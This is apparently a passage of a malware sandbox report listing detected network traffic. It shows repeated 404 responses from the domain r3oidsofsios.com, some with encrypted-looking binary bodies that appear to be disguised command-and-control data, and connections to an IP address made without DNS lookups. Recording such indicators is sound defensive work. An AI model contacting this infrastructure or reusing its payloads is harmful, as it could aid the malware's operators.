                              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:50 GMTServer: Apache/2.4.41 (Ubuntu)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 32 37 34 66 65 0d 0a 2f 00 00 00 8f 3b 41 35 46 2c cf 62 b4 69 4c 7a ea be ee 06 5f 4c ee 8e a8 e1 af 06 13 a0 cc 71 e9 ea 11 2f 96 e3 88 cb 32 b7 9a 95 e1 3c f7 13 c7 f8 58 00 ca 74 02 00 1c ac 2b da 00 0b 07 00 09 00 34 00 00 01 54 b5 a6 04 fa 19 13 50 fe ad bf fe 50 01 0b 00 6b 6d 9b a1 be 47 6b 95 bb 2f 20 d4 c8 8f 3e f9 48 d9 5d 6d 65 6d 75 16 dc 93 04 9a 4e 3d 6e 00 a7 fb c4 e6 ba 10 81 4e de c9 81 63 bd 6b c1 21 12 08 03 82 92 b9 66 33 2c c4 d8 a4 26 81 d2 23 e6 f5 f0 39 01 b1 f6 c3 ff ed 03 02 bb a2 cb aa 25 f7 50 36 a5 43 cb 97 a8 89 2f 73 18 41 7c 38 c8 25 6c e3 2a 3c 5c 31 22 93 fa eb 08 47 0a cb 81 c7 f6 64 05 28 c2 6a 21 d2 ce 9f ad 76 7d 4a 1a d8 92 2f 8c 78 c6 24 f2 d6 cf 6b fb c5 e7 05 b0 1f 95 8d a2 26 fc ad 77 7d 1f 5b 65 2f 3f 20 47 56 ae f1 94 d8 e8 af 02 9c 35 87 be c3 a6 6b 91 75 5d 48 ac 3a 7e a2 d9 1c ad 62 4f e2 8d fa e3 a9 4d d6 02 65 2c a5 97 c6 61 03 59 fc 1d d4 88 16 72 64 45 ef 71 50 7d 98 6f 6e 3b 4c 4a 24 46 46 d2 e5 01 0f 29 c5 77 b5 91 d2 cf 70 47 4e 70 90 b9 1a e8 a3 c8 f4 35 b3 7d 94 47 eb 9e 1c 83 1b 9f 2b 04 01 20 1b 5d 82 c5 96 4e c0 54 3b 64 88 1b 82 ad a0 f7 12 e2 23 b3 67 bd 67 b8 6c d5 2e df 89 bb 99 b8 f8 a8 37 72 14 26 37 4c 36 33 93 ea 14 9f fc 79 88 6c 52 f9 4b a8 4b 79 72 fe 17 4a 97 56 fc 2c 49 19 fe ac 9b 63 57 59 57 b2 6d 42 86 48 71 26 85 c8 e9 46 b3 be 7d 6e 49 77 a0 bc d7 28 3b 4d 72 ba 0f 96 20 d8 e2 f0 06 2a 13 f4 31 f3 75 9d 49 ed a3 a9 16 2a be 8b 64 65 69 55 b5 88 be 3d 47 b3 fd d6 b1 69 98 52 de 77 cb ee 26 12 15 57 48 43 74 87 cc a7 87 b5 da 57 bd 62 db 5b 02 16 5b 43 da 83 e9 7d eb 69 ba cb 94 e0 d3 9c 36 d6 e8 5e 61 b8 d3 7c 0b 4f 5f d4 5f 20 84 6f 29 33 35 f8 06 1c 4b 74 4f 8b c3 37 09 e9 f0 3f 99 f4 29 aa d7 6c e4 9b 7d 8d 35 38 05 d8 ed 28 87 b4 7c 23 20 1a 4c 17 4f d3 f2 78 47 99 4d 46 4c ff 34 b5 cf ce 58 f4 58 6b ff 58 95 63 70 fe 45 7b 44 6a 9d 01 70 a4 96 d5 37 e9 53 35 1c ec 0d 77 3d 02 33 8a 5d 4f 02 f9 f2 29 23 5a ba c1 49 cd e4 b9 8f de 25 c8 51 82 ca ba 10 3a 0d e9 c9 3c 79 23 63 02 10 48 3f 91 d7 9d ee 95 29 de 70 a0 eb 9f 55 33 e8 17 3e 67 82 d3 5f 4a b1 d1 1c b2 35 6f e1 d4 36 68 1c b3 19 84 3c 49 ae 3a bf 98 c3 68 29 98 be f9 8d 66 0e 59 d3 88 1d a4 ea 06 bc 7f ab de 5a 8a 42 d8 ab 4a ed 7b 02 99 5f 31 df c6 ae 1b 3c a7 00 1c 42 02 01 1b 9b b8 5a 93 aa ba 49 d3 17 c5 0a f3 97 e0 63 f3 d1 e5 b9 41 bb 2a 06 24 ad af b9 25 17 3b f1 9b 84 1e ce 34 9c 3a 66 91 81 a2 ef 69 19 74 61 e8 33 37 39 af ed b1 65 c2 c3 f9 b0 fa f4 1c 64 c9 43 62 b0 fb e1 82 2e 1e ff a9 5b 8f 2c 06 1c 99 47 12 ba b9 cb de a6 fb 99 d6 48 4c ef 17 cd 38 c0 b1 f7 5c 4d 17 a5 55 86 f6 0f 6e 91 4f 16 df 22 08 2a 6e 37 d0 e4 00 c5 68 60 4a 30 1a 94 6b 3c 70 15 50 86 ac e2 b2 6c 59 c9 04 da 97 f7 61 7d 85 31 2d cb 9f 14 c0 72 fd 91 84 ff e6 9b 97 bb 1d 2c 7e fc 66 96 1e 85 41 67 5c 41 d7 d5 63 7c 55 a6 73 68 f1 7b 06 63
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:51 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:53 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:53 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:53 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:54 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:54 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:55 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:55 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 54Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e0 8a b3 f4 b8 1d 48 b0 d1 2a e6 e9 12 39 98 eb 92 f1 32 f0 83 9f b1 22 b7 4a 9a ae 1a 2e 91 76 49 8b Data Ascii: %S`Nh&WQY^H*92"J.vI
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:56 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:56 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 47Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb b8 4c 03 42 ba cd ec a4 f8 48 1d e8 9e 79 a7 a2 52 3c 84 f9 87 bb 23 b7 82 91 ae 23 a4 5b 9b Data Ascii: %S`Nh&WQLBHyR<##[
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:58 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
